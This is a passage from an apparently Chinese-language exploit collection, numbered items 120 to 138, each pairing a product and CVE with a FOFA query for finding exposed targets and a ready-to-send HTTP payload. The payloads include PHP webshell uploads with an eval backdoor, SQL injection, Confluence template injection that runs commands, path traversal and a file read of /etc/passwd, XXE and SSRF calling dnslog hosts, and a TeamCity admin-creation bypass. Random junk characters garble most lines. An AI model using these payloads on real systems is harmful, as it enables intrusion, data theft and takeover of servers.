X-Forwarded-For: 1.1.1.1- x* `1 }0 I. b! [4 v
X-Originating-Ip: 1.1.1.1
5 ^3 S, I$ n9 K& M7 SX-Remote-Ip: 1.1.1.1- `! a: }) P" Y2 f* H) c
X-Remote-Addr: 1.1.1.13 l( H7 q) [) C2 w
Te: trailers
8 ~& t" c3 g- o5 D* T8 \, gConnection: close* b# e4 T' @& }: j: ?; \
9 t9 S! }, s$ ~, V) {. h: Ssrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
z4 f- j( u" {; p2 `
2 G# Y/ C/ a3 N4 r6 e; ~& A! `! i( J; d0 O7 [. |
120. 北京百绰智能S40管理平台导入web.php任意文件上传) C2 r0 s+ \; _3 G8 s
CVE-2024-1253' Y' x0 d$ H1 U- C) j% X' U! j* ]
FOFA:title="Smart管理平台"
" u& s: W8 k8 w, N5 w2 mPOST /useratte/web.php? HTTP/1.15 G# {- I. O+ m- s+ w5 f2 Z* }
Host: ip:port8 ~, _+ g. X S' L& Q) J1 T) x# N" t5 a
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
7 u6 J* w" p4 }8 [7 dUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko! X# W9 O n- m+ X. {% f/ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 y- Z8 Q! J: n4 u; t; lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 O3 B' d5 w# E6 Z) D
Accept-Encoding: gzip, deflate
% C, d V3 h2 u, ?0 d0 B$ G1 gContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793282 |( d/ ` J7 m- I2 p- \! F
Content-Length: 597
* e. |0 ~+ V* C: B& ^Origin: https://ip:port4 f/ L" U' O/ H2 J/ p
Referer: https://ip:port/sysmanage/licence.php
J9 y' k, c& h; J- QUpgrade-Insecure-Requests: 1 }( N$ J$ E0 S2 v- Y
Sec-Fetch-Dest: document
5 I2 O( [* z: T/ DSec-Fetch-Mode: navigate
! h7 Z1 v, U4 d* }Sec-Fetch-Site: same-origin, H7 k* J$ R8 R+ ]. Z1 w
Sec-Fetch-User: ?1) _# R0 t2 z+ J0 A5 [
Te: trailers
( l9 c- w( F* M, C! ?8 B& YConnection: close
, d4 u4 O3 T) v( z2 r* w# \ {
: ]! I( l* I& h) d. z6 U1 x-----------------------------42328904123665875270630079328$ P0 x9 V3 @% K4 l1 u$ A
Content-Disposition: form-data; name="file_upload"; filename="2.php"# \( E' K+ J0 \$ w- F! h
Content-Type: application/octet-stream/ i9 B' q0 _( N7 T2 B. ^
0 h( m# l! [9 Q0 V1 P' c+ u
<?php phpinfo()?>
! g! A9 ?. I) g; s t9 P-----------------------------42328904123665875270630079328: ]9 \; E1 H6 p3 Q. }2 S) A
Content-Disposition: form-data; name="id_type"
/ P3 j& A. c ~ O1 |8 |) V; ~# `1 [ v9 `2 @
1( Y3 W4 F7 K/ Z! w8 ~8 B
-----------------------------42328904123665875270630079328
4 ~# T4 ?0 U1 f# u9 L9 JContent-Disposition: form-data; name="1_ck"+ t! \: f5 P, v
% h: V" Y2 c2 v. V$ d/ n, v
1_radhttp
* @7 z' ~3 n' p/ T2 s' S0 P K-----------------------------423289041236658752706300793280 g- [" N" `! J) n" Y
Content-Disposition: form-data; name="mode"" Y" p% R& G2 |+ j( P& x9 p
) D8 ^( `$ s% U8 X( P
import
4 Z2 ^2 g. [( T3 {+ t-----------------------------423289041236658752706300793283 L7 Y n% F% T# I! [* N' d% W
- |: P2 c E: J# u/ B
9 h+ e1 k$ x- a% N6 {2 x& r文件路径/upload/2.php
- e+ V1 ^/ @* r' g4 w5 A
9 Y$ B' R: T" h) K3 H121. 北京百绰智能S42管理平台userattestation.php任意文件上传) o% X4 Y- T; ~. [& }9 c. U g
CVE-2024-1918: b r* `7 U e( O- c9 ]3 _
FOFA:title="Smart管理平台"0 I: \+ R6 h0 @% @1 X' y4 Z
POST /useratte/userattestation.php HTTP/1.1% {' n7 D" T+ d% `
Host: 192.168.40.130:8443' G* ]: C) M; ^
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50+ Y) U6 z8 i& l8 r& H X
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: G( C/ T/ J2 Q+ e E( c* ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; Y2 @! y( R4 p6 A, aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- U' ~8 y7 E6 q/ ^0 J- m- \9 n+ t# A4 wAccept-Encoding: gzip, deflate
@( Y! J, e: {4 I% B4 q0 x nContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
; R2 L7 |; R0 p3 [4 X. DContent-Length: 592: Q! w1 |2 w5 ~& W
Origin: https://192.168.40.130:8443
4 C8 Q! w# E8 N1 k- Y3 IUpgrade-Insecure-Requests: 14 {4 x m5 u! k5 b2 a( a
Sec-Fetch-Dest: document; O) J$ n' Y. H( c
Sec-Fetch-Mode: navigate/ Q9 c# J: Q1 g8 X* M
Sec-Fetch-Site: same-origin9 a& |% X4 i1 N
Sec-Fetch-User: ?1
9 X7 S: w+ l! }( _) _4 a( WTe: trailers
8 K4 \) l- t( I. rConnection: close1 b8 n5 _4 X& @
: C$ `0 q) b6 \-----------------------------42328904123665875270630079328
- j4 ] x* k2 c! R% {Content-Disposition: form-data; name="web_img"; filename="1.php"0 L0 `5 m& \- ~, h) \: Z9 c
Content-Type: application/octet-stream/ \2 O8 d1 j5 g* H8 T
t$ ?, J- P- I2 Y. l
<?php phpinfo();?>9 U* E1 C8 ]# d$ A% }, [
-----------------------------42328904123665875270630079328, F/ E1 O2 O( c* F( \
Content-Disposition: form-data; name="id_type"
1 P3 g" I/ ]1 X0 @) U& b
9 e0 y. O& o/ f, L+ Y3 s1
7 g0 _+ |4 \, z-----------------------------42328904123665875270630079328
$ u. e! P9 ]4 H8 _4 ^Content-Disposition: form-data; name="1_ck"5 v6 u# Z! }7 c6 H) W0 h
- |, ^1 j% X& ]- Z+ |
1_radhttp+ Q, k- r) T4 R- a; a- K! p% b) T
-----------------------------42328904123665875270630079328$ \& Z7 `8 C4 `
Content-Disposition: form-data; name="hidwel"
# k. a3 K4 H. Q' K" U; R! S3 w* d7 _
set
# i* m: q9 R3 a* q6 ]5 x$ e& ~ \-----------------------------42328904123665875270630079328
% e0 j4 g5 \+ x+ Q2 p& K$ A; V) B
( {0 A$ s; y" X% }) e, G$ m7 f0 e& o) O- K* D2 v
boot/web/upload/weblogo/1.php! f [2 c7 C( o. I. _
$ S9 ?4 w" A0 B
122. 北京百绰智能s200管理平台/importexport.php sql注入3 J! n2 X* t* L# ^$ M4 Q) P
CVE-2024-27718FOFA:title="Smart管理平台"; V T- b! s9 d2 p/ [* M; N8 q9 w) u
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version() w8 y1 T: S* }4 |1 R5 U7 A
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1' T( p5 M% y3 d9 m
Host: x.x.x.x
. N j" ~" }: ~, `; c* DCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
. Y1 C: Q& K( l, z, \8 G( ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 Q& u: z8 Q! a& i/ h( t' ~( t) eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: N+ g& Z$ F4 K2 L4 n! a# x: ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# Q) s* A+ ?+ Q6 u O6 T
Accept-Encoding: gzip, deflate, br
5 P# z4 h( ]9 O5 E/ {2 }5 R gUpgrade-Insecure-Requests: 1+ [& R9 Q2 V( v
Sec-Fetch-Dest: document* R7 s P0 F$ N
Sec-Fetch-Mode: navigate/ k) W: M0 N) e. U
Sec-Fetch-Site: none
. F! K$ L2 R, WSec-Fetch-User: ?1
8 }; F) L- o$ o* m1 dTe: trailers q/ V% v8 t) ]1 m5 K- S
Connection: close; s. p* M% i6 G
* K; F0 s5 Y" ]! L l7 j. g
3 m0 J( g# e/ W) Z- U$ f; o6 O+ Q123. Atlassian Confluence 模板注入代码执行- M& i2 ?! m6 L- F
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"4 K0 _# f7 D! e
POST /template/aui/text-inline.vm HTTP/1.1
$ r" W0 S, ~9 cHost: localhost:8090
# I& p/ @- @+ n/ M" ?Accept-Encoding: gzip, deflate, br: a. c- I; S5 p' Y. v: b
Accept: */*4 _0 o1 ?- W; J( z2 ]( Q \$ s5 c
Accept-Language: en-US;q=0.9,en;q=0.8
: `% ]* V5 _' G" Q6 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36; l' y& ^2 k# k( ]. r, o
Connection: close. A5 A9 | X+ I6 P3 _/ Z0 j1 v
Content-Type: application/x-www-form-urlencoded$ _, a; D/ L M6 [5 u5 c/ f% }
1 t/ h5 A( {$ J3 ^
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
# H% N' V8 ^# F. N% p6 ^+ ]
2 ?, h2 i) F5 t0 {+ H9 A! r; J! @( e1 m) w/ l: W% p7 x
124. 湖南建研工程质量检测系统任意文件上传* y3 P% ]1 x+ x) u
FOFA:body="/Content/Theme/Standard/webSite/login.css"1 j" C* u% a* i2 f* f$ h$ e
POST /Scripts/admintool?type=updatefile HTTP/1.14 o" B- l2 Q' Q) v% j
Host: 192.168.40.130:8282
3 l' n6 M8 Y. D& @User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
' F( ]1 N, k7 S3 LContent-Length: 72
0 J6 b% K7 [3 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8, }+ W7 ?4 A6 L& g3 N9 t& q v5 X
Accept-Encoding: gzip, deflate, br
3 ~! Q9 g# I! y, G7 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 F6 n0 m' _% J5 ?7 b% ]
Connection: close
+ v3 s: h! }/ e5 K( UContent-Type: application/x-www-form-urlencoded' n# D# c! z- u `. `" \7 A
1 C/ T: ^3 \+ X( u( K3 xfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
1 w. d I, r# v
! S$ s/ Y# u R, n- L3 ^! ]. S( u! M; r# ]0 O5 @" v8 d
http://192.168.40.130:8282/Scripts/abcgcg.aspx
) @. g8 G$ m6 l8 ~- _6 \+ J
0 n' M ~; E2 L* ?# t1 g. a2 Y125. ConnectWise ScreenConnect身份验证绕过# {4 p% h+ ^- M( \
CVE-2024-1709# D8 K$ @7 h# Z; F* V2 Y8 H
FOFA:icon_hash="-82958153"
8 }, }3 H- O& ?: nhttps://github.com/watchtowrlabs ... bypass-add-user-poc
1 q% c8 S% n" o% Z3 E2 f; L8 R
+ D& v) n0 F" B! J2 \
& w1 w$ Y& [$ `# i使用方法
9 _2 n8 z0 h. c& b9 \8 a! x1 Zpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
6 C8 V( W& m" v* {8 u7 f" p* u+ c6 s
) X, ~7 D# N7 r+ M8 M$ d创建好用户后直接登录后台,可以执行系统命令。, W1 a# C4 M, |% p- k% l6 q9 K8 A+ g4 v
+ h; N$ A0 L* [0 k4 O3 L! o' z126. Aiohttp 路径遍历
e5 b0 |3 S& v5 H L0 z) ~FOFA:title=="ComfyUI"" f, B% s V# _+ i& C' Q! }
GET /static/../../../../../etc/passwd HTTP/1.13 D9 k' l, ]6 R$ }3 V' u
Host: x.x.x.x c# H6 o9 ^( a n; o/ H$ X" B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( R6 `* M% i; }1 [0 G$ \ u* c+ R/ F9 P
Connection: close3 q/ V# J7 a. `" ^& e* Y1 Y
Accept: */*7 b0 O$ U5 S8 N* [, S/ ]
Accept-Language: en
* q& D, F5 d" N- MAccept-Encoding: gzip
' b6 d% U3 Q/ e3 {' v: f$ i/ `
2 Z0 Q# Q9 P5 G" o8 S3 Y: A+ o$ k
127. 广联达Linkworks DataExchange.ashx XXE
! N7 T0 j6 e5 ^7 k ^/ {FOFA:body="Services/Identification/login.ashx"
1 F1 w! p8 W' H3 U% |POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
5 m- S" \& d% `3 FHost: 192.168.40.130:88884 L, F6 a+ m) c3 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
: r! X( w6 Y2 s2 b& @" D* A# g$ PContent-Length: 415
+ w5 W- t* }" i: j3 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 T3 Z+ e. l9 S/ I- A, p9 `( P( tAccept-Encoding: gzip, deflate
+ _" Q9 Q& K4 ~! fAccept-Language: zh-CN,zh;q=0.9
/ n' X8 n ^8 @2 YConnection: close
% H8 w" t$ ~6 Z# K3 n. FContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
( f: I3 A: b9 V/ N( ePurpose: prefetch' N5 T' M( O B& A- V# K/ J3 P, Z
Sec-Purpose: prefetch;prerender* z/ l6 C6 A" Q1 e6 Y4 Y) X" A
# l" u( [: c8 J+ M------WebKitFormBoundaryJGgV5l5ta05yAIe0* ~7 p* | S2 }& z; L: ^ b# j: k
Content-Disposition: form-data;name="SystemName"
7 {. u' B* r% }, Z0 G
) A# w9 K* e! yBIM
' r) ]# q ?4 O/ G3 S7 Q5 |& t M------WebKitFormBoundaryJGgV5l5ta05yAIe07 c. M9 [+ J+ E8 l" k0 M
Content-Disposition: form-data;name="Params"9 [9 }/ s$ u$ _% L& C C
Content-Type: text/plain
; y3 l4 n/ t7 k/ @0 g5 N
" b1 k) q$ Y/ B [) s; u5 S2 W5 D<?xml version="1.0" encoding="UTF-8"?>; }0 T7 H8 R" I
<!DOCTYPE test [
9 }* q* |/ g) [, o- Q; Z<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">, l- C! B2 i9 |) a" c
]
9 P& p; ?, T0 x1 ?4 P$ _1 e; O" t8 _>
3 O8 V5 K1 [. c) P( P" I<test>&t;</test>
$ }( @0 }" B9 \! Q& h/ S x2 v------WebKitFormBoundaryJGgV5l5ta05yAIe0--/ b; }) r9 h& X& p' |, \6 B
# Z3 a6 }4 G1 Y& a4 Q( ]6 Y
' Q& R6 @9 C1 h& {6 Y; o
2 I% F. p/ c1 ?% y128. Adobe ColdFusion 反序列化: u Z$ C( A! a/ M; Q. h5 A8 \
CVE-2023-38203
; i2 a; H% B* M8 ^7 uAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)2 K" j, _/ h$ b7 |3 u" _
FOFA:app="Adobe-ColdFusion"1 `4 d. ^+ g* A
PAYLOAD1 R9 v9 m; W, h3 j4 B1 t
" T, v& f" c. w H% D, a
129. Adobe ColdFusion 任意文件读取* P/ }' N2 X8 l- l
CVE-2024-20767. `& Y1 y" d5 Q
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
$ S7 t- J# I& F( @2 T第一步,获取uuid
5 x" p$ J! W! ^8 Z7 \GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6 `3 |( j/ p: M/ Z6 NHost: x.x.x.x
/ O( u) q d+ q7 y; tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 K) g/ D8 n0 X
Accept: */*
! ?3 y3 h# T; x; b4 k7 h. l: DAccept-Encoding: gzip, deflate/ K+ V3 X& m: F
Connection: close
' m& ~, b) |+ |$ Q' `1 a. f
% N* b- Y* ^3 z& K1 Q; Q6 h. w
第二步,读取/etc/passwd文件# L2 c1 Y' X( D
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1# _/ r8 Y; U: q; j8 y% G
Host: x.x.x.x
9 t1 S4 [* f, M B( x" VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- f+ O {- B( g5 ~- w6 o6 ]- P, R( I
Accept: */*: L! ~! x$ J( q: S* J L3 `* q
Accept-Encoding: gzip, deflate" d# E9 ^) Z7 X3 t
Connection: close
# b3 N# x: `6 ?uuid: 85f60018-a654-4410-a783-f81cbd5000b9. D+ b" v! ?# ]7 M
$ ~ j% s# ~# K, A
# I2 t1 P5 V+ E130. Laykefu客服系统任意文件上传' X: U h0 k+ \* L
FOFA:icon_hash="-334624619") u, _% G }, i0 A) P3 T
POST /admin/users/upavatar.html HTTP/1.1
9 L% T6 l6 X- K1 ^Host: 127.0.0.1' v' p6 M5 s% j) O1 B3 `
Accept: application/json, text/javascript, */*; q=0.01& k' A- G- G% L: y4 ]6 }3 s4 M1 l
X-Requested-With: XMLHttpRequest1 v. [" U8 r+ w
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26, i2 o; t9 k5 v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
7 ~6 t' A; p" d0 p. C5 S' KAccept-Encoding: gzip, deflate
# B9 c$ l* _: I' ~2 y6 vAccept-Language: zh-CN,zh;q=0.92 l D5 u3 ?8 X2 E1 }% X
Cookie: user_name=1; user_id=3" l& ?: |$ h% F8 \0 M u
Connection: close
2 c; B5 ^% T9 w
: X" V* `7 o# i- W. t------WebKitFormBoundary3OCVBiwBVsNuB2kR4 A; U" {8 U! Z! x9 ^4 L" j( T! c' o
Content-Disposition: form-data; name="file"; filename="1.php"
' _' ?. s. r; _! gContent-Type: image/png' S$ h N9 S& G& A1 H! V
. N1 I" S7 C3 G1 n! R
<?php phpinfo();@eval($_POST['sec']);?>; V4 E5 o/ v4 V+ V( y# |7 l; ^# Y: Z
------WebKitFormBoundary3OCVBiwBVsNuB2kR--3 _: L8 F: X; f# E! C* T
1 c3 v! o) W- S$ I7 b$ |
$ [8 w a- d$ Z! m' Z! d# T131. Mini-Tmall <=20231017 SQL注入
" z/ s! K- V! v! O/ UFOFA:icon_hash="-2087517259"4 G0 g6 h5 e; G2 e# J, x
后台地址:http://localhost:8080/tmall/admin
1 w! T) K! Z! hhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)4 }8 R. `+ N, k9 t
- G9 g$ |* e6 r) y) R9 Y4 c6 [132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过8 `& h' @4 X" L/ Y
CVE-2024-27198
- y# @/ _% U* u6 p; n' U' r5 ~FOFA:body="Log in to TeamCity"0 C( |( ^! n. Z- \( L3 U
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
8 Q7 r3 u3 c, ZHost: 192.168.40.130:8111
/ j& D! L8 T- T5 _2 t" `9 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: ]4 C# s ` l) IAccept: */*
# u5 r4 o8 A* E o- MContent-Type: application/json
" y% f" Z' I; V2 ~& Z! h F2 FAccept-Encoding: gzip, deflate
4 h3 P1 [" m/ r( ?9 r' h( w7 C2 k" t! u: C
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}$ J7 H- u2 r8 K5 g2 V3 ~. S
" V* I* s0 ]0 \% `: V$ R s& D, j: H6 Y3 T+ m" ^0 w. o1 q
CVE-2024-27199
7 n* f9 X- p( ?+ N2 ?/res/../admin/diagnostic.jsp
& ?. O6 y/ r! g1 v3 H/.well-known/acme-challenge/../../admin/diagnostic.jsp& H6 Y ^( [" O8 Q/ V; y" x$ w
/update/../admin/diagnostic.jsp
& k& `8 }; h _
+ K- b" P3 T4 q3 {
+ c# E% o) I+ S' v2 ? ?8 T3 KCVE-2024-27198-RCE.py5 c: e" M) [5 G5 u1 G! v$ f' J1 ~( S
7 R, z! S# r4 o+ l133. H5 云商城 file.php 文件上传
- g8 e% W) M3 a, M5 e {/ |8 V0 wFOFA:body="/public/qbsp.php"( G: l* [5 I8 w
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
: B w+ P+ \. I& j# @Host: your-ip! C, V9 n" }0 [7 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 F) s% Q& X; Z0 w8 r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx- n% v, x0 F, O& v; c) _: G
: g! ]& \* r" K------WebKitFormBoundaryFQqYtrIWb8iBxUCx
6 l: h8 h# F7 iContent-Disposition: form-data; name="file"; filename="rce.php"7 c2 Y8 p! M; h
Content-Type: application/octet-stream, u: P9 H# }) ~0 ~/ R1 n
- o7 V3 T: A1 W6 |# ]$ E: G( c<?php system("cat /etc/passwd");unlink(__FILE__);?>! P, X' \3 {: W) }9 _
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--* {$ J4 U# m3 f% Q, C
: q% h" L, V3 }) N7 E; a* I
; P: r' u, A/ L* l3 y% ]0 _ G3 o& W0 X8 W* ?, S' ^
134. 网康NS-ASG应用安全网关index.php sql注入5 b# V1 k2 D2 A1 F3 H4 R) Y4 d. ]3 F
CVE-2024-2330
8 b, k# ` |1 u% H6 g: SNetentsec NS-ASG Application Security Gateway 6.3版本
$ u0 T0 {( p% u5 w: H1 O( Q. W. H7 DFOFA:app="网康科技-NS-ASG安全网关"
3 m# R- u4 y' Z+ U% lPOST /protocol/index.php HTTP/1.1, b8 d# s0 z `! p
Host: x.x.x.x- q) s5 d* e( C, B; E2 [( b
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de, L- n" ^3 m; d/ R: v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 C* r4 }0 F8 g2 X+ G$ \
Accept: */*
; {5 Q2 `. N0 j' q# xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 o8 N) s# A( x0 a. EAccept-Encoding: gzip, deflate
- d6 V4 O% T8 q+ |, iSec-Fetch-Dest: empty
4 @& W' l' i) @; A {7 }6 f" @- |8 }Sec-Fetch-Mode: cors
" g( v8 W4 n$ Z" T9 w. mSec-Fetch-Site: same-origin
8 P: m- s, K6 m( `2 ~* U# I! l. hTe: trailers: H- g! H! U \4 X6 U% y6 H
Connection: close( G2 o* S1 ~0 x+ K9 |2 v) I
Content-Type: application/x-www-form-urlencoded Y/ ~0 `$ e5 [; U) h+ @4 P
Content-Length: 2633 V; \7 t" x" a, R
6 M1 I+ [( f- V7 v! p) I% |
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
+ h) l& \! z' b1 r
7 M; B) l8 p3 C' S) y7 ^" q* F
{# x" E# Q. }0 p; ?1 w135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
2 e+ c2 S( [1 b- Q8 aCVE-2024-2022
) I, F2 I* J/ `( ANetentsec NS-ASG Application Security Gateway 6.3版本& C' \0 F# Z. M! R1 I z
FOFA:app="网康科技-NS-ASG安全网关"
: G% e! O5 t5 \3 n6 ?GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.17 w% d% d! b8 [% C
Host: x.x.x.x% W/ n8 ]8 m l. E$ a4 ] u1 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( N, `+ Q, \2 D! i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* x. W9 k5 x! g7 a
Accept-Encoding: gzip, deflate6 a. W. \$ {7 ^7 Z% P
Accept-Language: zh-CN,zh;q=0.9
7 b, E5 H+ r; o6 W0 g: _Connection: close
- U8 k; N1 c% U/ L* U, F. T! y
4 m8 B/ r" v( A" K F; o) ^
0 D9 b+ L S* Q$ k) j136. NextChat cors SSRF! X9 J$ R9 E) {$ u4 F8 B
CVE-2023-497856 ^8 H' B& T0 T+ `
FOFA:title="NextChat"7 {$ O! R- ]5 f& T1 Z5 B+ ]9 E
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
2 m9 F0 d% n$ j2 t) l7 jHost: x.x.x.x:10000
1 F7 _6 |. ^0 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# I) z$ |# A+ \) @
Connection: close9 x# K+ |0 G1 f# g
Accept: */*9 \4 x: x: y$ n* E; n, |8 I
Accept-Language: en# G) v" A& C5 p6 f$ q+ @! b# w
Accept-Encoding: gzip2 C# y6 L `. |" Y7 F; O( v
' R1 T2 @& O) ?( Q. R2 t- K2 M6 T- `- U) R5 F
137. 福建科立迅通信指挥调度平台down_file.php sql注入
( {) a! x& S5 u0 _$ U5 O% FCVE-2024-2620
. ?0 L% C! K3 _0 `5 rFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" {/ J+ h- o4 g% g) z$ h9 @0 w% A, N
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
' y$ D% B7 T P3 |; SHost: x.x.x.x; S2 e8 L* }! U- N' Q8 f% P4 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ M8 v' R8 [& X8 w8 P5 W, Q; m' b- d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! N3 J6 k# y3 J! ^% N4 _% S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& i& c/ A8 x6 y1 ]1 _Accept-Encoding: gzip, deflate, br7 J% Y& W3 M& D0 Y, H
Connection: close; a3 c8 O- z8 z2 e& I
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj1 y. w# ^/ Z R e, @+ a# L! y
Upgrade-Insecure-Requests: 18 t: H% ^9 G/ t9 q1 q5 p, S
1 |) J9 Y. t9 l$ M5 y4 _% r
0 k- O; D! Z# i2 v. b. P& F5 s N138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 K. b1 V0 Q6 g" M: k9 I9 R
CVE-2024-2621
# i* }; P* R7 O7 {FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: s% a+ G( L# t, }9 j4 s7 Q2 yGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1" l5 J& t* t4 m
Host: x.x.x.x. t# i" j. u9 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 E9 e( P4 B8 z4 v1 `- S2 d( R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, l. d+ f; O1 _) x0 e* j* O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) x1 w# c( ]& P7 gAccept-Encoding: gzip, deflate, br( c7 j8 w" N+ u' x3 z0 R( ?
Connection: close# _# ^. ^* {4 }" `7 T& p; l
Upgrade-Insecure-Requests: 1
% @! j" G; I G9 W( N2 ^! C7 _0 b: n+ C$ d6 a
+ ^- {: Q4 o3 c" `
